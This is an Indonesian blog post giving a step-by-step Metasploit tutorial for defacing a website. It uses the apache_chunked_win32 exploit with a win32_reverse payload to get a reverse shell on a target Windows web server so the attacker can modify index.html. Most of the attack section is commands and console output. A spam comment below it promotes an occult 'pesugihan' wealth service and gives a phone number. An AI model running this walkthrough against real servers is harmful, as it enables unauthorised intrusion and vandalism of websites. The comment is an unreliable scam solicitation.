X-Steel - Wait

Social Icons

Saturday, 23 August 2014

Defacing Menggunakan Metasploit Di Kali Linux

  1. Seperti biasa, masuk console aja. Next ketik msfconsole
    root@bt:/# msfconsole
  1. Setelah agak lama masuk juga di msfconsole, kemudian ketik show exploits
    msf > show exploits

    Metasploit Framework Loaded Exploits
    ====================================
    Credits Metasploit Framework Credits

    afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
    apache_chunked_win32 Apache Win32 Chunked Encoding
    blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
    distcc_exec DistCC Daemon Command Execution
    exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
    frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
    ia_webmail IA WebMail 3.x Buffer Overflow
    iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
    iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
    iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow


    Jadi disini kita bisa melihat daftar exploit pada Metasploit. salah satu yang akan kita gunakan adalah exploit nomor 2 dari atas, yakni: apache_chunked_win32
  2. Lanjut dengan pake salah satu exploit diatas
    msf > use apache_chunked_win32
    msf apache_chunked_win32 >
  3. Sebagaimana yang terlihat pada prompt akan berubah menjadi msf apache_chunked_win32> dengan prompt ini kita dapat melihat berbagai opsi exploit jenis ini, silakan ketik perintah dibawah ini:
    msf apache_chunked_win32 > show options

    Exploit Options
    ===============
    Exploit: Name Default Description
    -------- ------ ------- ------------------
    optional SSL Use SSL
    required RHOST The target address
    required RPORT 80 The target port
    Target: Windows NT/2K Brute Force

    msf apache_chunked_win32 >
  4. Sekarang kita balik ke prompt semula, dan daftar opsi yang kita perlu isi seperti remote host IP address target, seperti contoh dibawah ini :
    msf apache_chunked_win32 > set RHOST 192.168.1.101
    RHOST -> 192.168.1.101
    msf apache_chunked_win32 >
  5. Disini kita dapat melihat berbagai opsi yang kita perlukan sebelum menggunakan exploit ini guna mendapatkan akses tingkat sistem. Dalam kasus ini saya menggunakan perintah berikut untuk melihat apakah opsi payloads bisa digunakan?

    msf apache_chunked_win32 > show payloads

    Metasploit Framework Usable Payloads
    ====================================
    win32_bind Windows Bind Shell
    win32_bind_dllinject Windows Bind DLL Inject
    win32_bind_stg Windows Staged Bind Shell
    win32_bind_stg_upexec Windows Staged Bind Upload/Execute
    win32_bind_vncinject Windows Bind VNC Server DLL Inject
    win32_reverse Windows Reverse Shell
    win32_reverse_dllinject Windows Reverse DLL Inject
    win32_reverse_stg Windows Staged Reverse Shell
    win32_reverse_stg_ie Windows Reverse InlineEgg Stager
    win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
    win32_reverse_vncinject Windows Reverse VNC Server DLL Inject
    msf apache_chunked_win32 >


    Opsi ini merupakan bagian dari Metasploit Framework, yang memungkinkan anda menggunakan “egg” apapun yang anda pilih. Egg disini adalah apapun payload yang akan anda eksekusi pada komputer korban. Pilihan ini merupakan hal umum dalam penggunaan security tool.
  6. Dari apa yang kita lihat diatas ada suatu kelebihan dari opsi yang ada pada kami. Dalam kasus ini kita akan menggunakan win32_reverse payload. Mengapa? baiklah kita menginginkan shell yang bisa kita gunakan untuk mengangkut materi bolak-balik. Tepatnya kita ingin meng-copy file index.html, dan membuat beberapa modifikasi alias Deface. Hanya dengan shell itulah kita dapat melakukannya. Harap diperhatikan bahwa kita perlu memberitahu Framework tersebut bahwa kita ingin opsi payload tersebut. Berikut ini syntax-nya:

    msf apache_chunked_win32 > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf apache_chunked_win32(win32_reverse) >
  7. Jadi kita sekarang telah menentukan payload dan telah menjadi prompt dibelakangnya. Apa selanjutnya? Hmm… kita perlu menentukan IP address untuk menerima reverse shell tersebut. Ingatlah kembali beberapa langkah sebelumnya saat kita mengeset RHOST untuk menentukan mesin korban? Kita juga perlu melakukan hal yang sama untuk menentukan receiving host. Silakan lihat perintahnya dibawah ini:

    msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
    LHOST -> 192.168.1.102
    msf apache_chunked_win32(win32_reverse) >
  8. Sekarang saatnya kita menjalankan exploit. Syntaknya adalah sebagai berikut:

    msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101
    Starting Reverse Handler.
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...
    Got connection from 192.168.1.101:1031

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\Program Files\Apache Group\Apache>
  9. Nah Kita sudah Masuk tuh Ke shell webservernya target........
    kita mau apain aja terserah.....


    Gunakan Pelajaran ini untuk kebaikan,,,,bukan untuk keisengan,kebencian ataupun kesenangan,,,,!!!

1 comment:

  1. Assalamualaikum wrb,saya Rahman saputrah, niat saya hanya ingin berbagi kebaikan khusus kepada orang yang mengalami kesusahan,percaya tidak percaya semua kembali pada pembaca postingan saya, awalnya saya seorang pengusaha yang bisa dibilang sukses, tapi banyak yang tidak suka kalau saya sukses,dan akhirnya bisnis saya bangkrut dan saya sempat jadi Pengangguran kurang lebih 1tahun saya punya anak 3 dan masih kecil2,saya sempat putus asa dan tidak tau mau berbuat apa, tapi setiap saya melihat anak saya, Saya merasa kasian, dan kemarin tampa disengaja ada Teman saya memberi saran dia menyarangkan saya untuk menghubungi Mbah jonoseuh, beliau memberikan bantuan Pesugihan, awalnya sih saya ragu tapi mau nggak mau saya beranikan diri mencoba bantuan dari Mbah jonoseuh. syukur Alhamdulillah dengan bantuan pesugihan beliau saya sekarang sukses kembali dan saya bisa biayai sekolah anak saya sampai selesai,terimah kasih Mbah berkat Mbah saya bisa sukses kembali,ini pengalaman pribadi saya khusus bagi teman2 yang sempat baca dan punya masalah silahkan hub Mbah jonoseuh di nomor 082344445588 dan pasti beliau bisa meringankan semuah permasalahan yang anda hadapi untuk saat ini, Dan terimah kasih kepada yang punya room ini karna saya sempat berbagi pengalaman dan mudah2han bisa membantu,

    ReplyDelete